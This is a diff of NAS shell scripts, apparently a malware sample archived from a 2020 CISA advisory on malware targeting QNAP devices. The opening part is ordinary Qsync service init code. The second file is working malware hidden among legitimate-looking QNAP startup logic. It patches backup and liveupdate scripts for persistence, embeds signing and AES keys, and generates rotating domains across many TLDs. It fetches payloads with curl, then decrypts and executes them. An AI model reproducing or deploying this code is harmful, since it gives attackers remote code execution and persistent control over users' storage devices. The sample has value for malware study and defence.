+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9526ccdeb9bf7cfd9b34d290bdb49ab6a6acefc17bff0e85d9ebb46cca8b9dc2

@@ -0,0 +1,926 @@
+#!/bin/sh
+{
+ts=1558069200
+PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
+test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
+test -d "$bdir" && break; bdir=''
+done <<EOF
+$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
+EOF
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
+
+test -z "$PWD" && PWD=$(pwd)
+CWD="$PWD"
+if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
+        CWD=''
+        for dir in '.config' '.liveupdate'; do
+                dir="${bdir}/.qpkg/${dir}"
+                test -d "$dir" && cd "$dir" && CWD="$dir" && break
+        done
+fi
+test "$CWD" && test -d "$CWD" && cd "$CWD"
+
+sedreplace () {
+local grepstring="$1" sedcmd="$2" file="$3"
+[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
+if grep "$grepstring" "$file"; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+sed -i "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+return $?
+}
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+file=''
+[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
+if [ "x${file}" != 'x' ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+fi
+done
+file=''
+
+if [ ! -f '1550379600_c' ]; then
+touch '1550379600_c'
+test -f liveupdate.sh && { dir=.liveupdate; file=liveupdate.sh; } || { test -f backup_conf.sh && dir=.config; file=backup_conf.sh; }
+cat >".backup_${file}" <<"XEOF"
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+domainexts='cf:0 tk:0 com:1 ml:0 de:0 rocks:0 mx:0 biz:0 net:1 cn:0 ga:0 gq:0 org:1 top:0 nl:0 men:0 ws:0 se:0 info:0 xyz:0 today:0 ru:0 ec:0 co:0 ee:0 rs:0 com.sv:0 com.cy:0 co.zw:0 kg:0 com.ge:0 tl:0 name:0 tw:0 lv:0 bs:0 li:0 ng:0 ae:0 bt:0 tv:0 pe:0 uz:0 me:0 gy:0 am:0 kr:0 by:0 fr:0 com.uy:0 com.lb:0 com.br:0 vu:0 hk:0 in:0 re:0 ch:0 af:0 com.ps:0 ug:0 dz:0 pro:0 co.th:0 sg:0 cd:0 so:0 mo:0 co.id:0 co.il:0 com.do:0 ke:0 cx:0 ro:0 id:0 pm:0 hm:0 vg:0 az:0 com.eg:0 bz:0 su:0 com.ar:0 gg:0 com.lr:0 pa:0 com.ve:0 al:0 fm:0 to:0 mu:0 co.ck:0 pk:0 co.rs:0 cw:0 nr:0 gd:0 gl:0 ac:0 lk:0 md:0 fi:0 sx:0 lc:0 es:0 cc:0 cm:0 la:0 co.za:0 je:0 cz:0 jp:0 ai:0 pw:0 bg:0 nu:0 ag:0 bm:0 eu:0 com.my:0 sc:0 ax:0 wf:0 ly:0 qa:0 vn:0 aq:0 mobi:0 com.tr:0 com.ua:0 com.py:0 hk.org:0 south.am:0 com.kh:0 co.zm:0 ru.net:0 com.km:0 tt:0 kn:0 co.ls:0 co.fk:0 uy.com:0 com.gu:0 .com.bn:0 com.pf:0 com.fj:0'
+n=0
+
+for ext in $domainexts; do
+	eval 'domainext'"$n"'=$ext'
+	n=$(( $n + 1 ))
+done
+domainextcnt=$n
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+XEOF
+cat >>".backup_${file}" <<EOF
+test -d "\${bdir}/.qpkg/${dir}" || mkdir "\${bdir}/.qpkg/${dir}"
+cd "\${bdir}/.qpkg/${dir}" && rm -f .tmp.*
+EOF
+cat >>".backup_${file}" <<"XEOF"
+
+echo "$verifykey" > ".rsakey"
+
+for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
+	tmpfile=$(mktemp "./.tmp.XXXXXX")
+	test -f "$tmpfile" && outfile=$tmpfile && break
+done
+test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
+curlconntimeout=12
+i=0 n=0 c=0 errorcount=0
+for interval in '1296000' '432000' '86400' '28800' '7200' '3600'; do
+	timestart=$(date +%s)
+	for length in 5 3 4; do
+		timenow=$(date +%s)
+		test "$(( $timenow - $timestart ))" -gt 600 && test "$interval" != "3600" && break
+		curlconntimeout=$(( $curlconntimeout - ( $timenow - $timestart ) / 250 ))
+		test "$curlconntimeout" -lt 6 && curlconntimeout=6
+		n=0; while [ "$n" -lt $domainextcnt ]; do
+			eval 'ext=$domainext'"$n"
+			l=$(( $length + ${ext#*:} ))
+			ext=${ext%:*}
+			if [ $length = 5 ]; then
+				hostname=$(echo "$(( $(date +%s) / $interval ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+				hostname=${hostname%${hostname#??????}}
+				eval 'hostname'"$n"'=$hostname'
+			fi
+			eval 'host=$hostname'"$n"
+			n=$(( $n + 1 ))
+			trycnt=0
+			while [ ${#host} -gt "$l" ] && [ $trycnt -lt 3 ]; do
+				trycnt=$(( $trycnt + 1 ))
+				host=${host%?}
+			done
+			test -f "$outfile" && rm -f "$outfile"
+			recentupdate=''
+			curl --connect-timeout "$curlconntimeout" -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+			test -s "$outfile" || continue
+			fsize=$(( $(wc -c < "$outfile") ))
+			test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+			rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+			test "$rsamsg" || continue
+			path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+			hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+			test "$rsadomain" = "${host}.${ext}" || continue
+			timenow=$(date +%s)
+			test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+			curl --connect-timeout "$curlconntimeout" -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+			filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+			test "$filehash" = "$hash" || continue
+			curl --connect-timeout "$curlconntimeout" -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+			verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+			mv "${outfile}_s" "${ts}_v"
+			chmod 755 "$outfile" || continue
+			( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+			test "${recentupdate:-0}" -eq 1 && exit 0
+			for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
+				tmpfile=$(mktemp "./.tmp.XXXXXX")
+				test -f "$tmpfile" && outfile=$tmpfile && break
+			done
+			test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
+		done
+	done
+done
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
